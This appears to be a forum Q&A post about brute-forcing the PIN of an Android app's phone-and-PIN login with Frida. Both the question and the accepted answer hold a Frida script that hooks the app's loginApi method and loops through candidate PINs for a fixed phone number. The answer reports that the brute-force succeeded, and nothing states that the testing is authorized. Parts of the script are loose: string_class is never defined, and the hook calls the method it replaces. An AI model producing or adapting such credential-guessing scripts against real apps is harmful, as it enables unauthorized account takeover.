# BruteForce login method on android using Frida

Tags: android, brute-force, frida

I am facing trouble while trying to brute-force on an app. The code of the method is as below.

```
private fun loginApi(phone: String, pin: String) {
    if (firebase_token.isEmpty()) {
        //
    }else {
        showDialog()
        //
        //  Code to call api and perform authentication
    }
```

I tried the below code, but that isn't working.

```
Java.perform(function () {
    var OTPActivity = Java.use('com.example.example.Getstarted.FragmentOtpVerification');
    OTPActivity.loginApi.overload("java.lang.String", "java.lang.String").implementation = function(phone_no, pin){
        for(var i=1140; i<1151; i++)
            {
                send(i);
                var my_phone = string_class.$new('/*Number over here*/');
                var my_pin = string_class.$new(i);
                var result = this.loginApi(my_phone, my_pin);
                console.log(result);
            }
        console.log('Done:');
    };
});
```

I am trying to brute-force using this method. Any help will be appreciated.

Comment: Sorry but you should be more specific about your problem, just writing "isn't working" is nothing we can help you with. Please edit the question and describe exactly what the problem with your code is.

Comment: Right now I am stuck for not being able to convert a Int to String, as when I view the adb logcat, there's an error as "java.util.String" class not found. Can you help me for not being to able to convert Int to String?

Comment: On the above code the problem was with ```var my_pin = string_class.$new(i);``` . But Now I am stuck for converting Int to String.

Answer (score 0, accepted):

I managed to bruteforce the method by just manipulating the Int to String conversion statement. The reeditted code can be shown below:

```
Java.perform(function () {
    var OTPActivity = Java.use('com.example.example.Getstarted.FragmentOtpVerification');
    OTPActivity.loginApi.overload("java.lang.String", "java.lang.String").implementation = function(phone_no, pin){
        for(var i=1140; i<1151; i++)
            {
                send(i);
                var my_phone = string_class.$new('/*Number over here*/');
                var my_pin = i + ""; /* Changed over here. */
                var result = this.loginApi(my_phone, my_pin);
                console.log(result);
            }
        console.log('Done:');
    };
});
```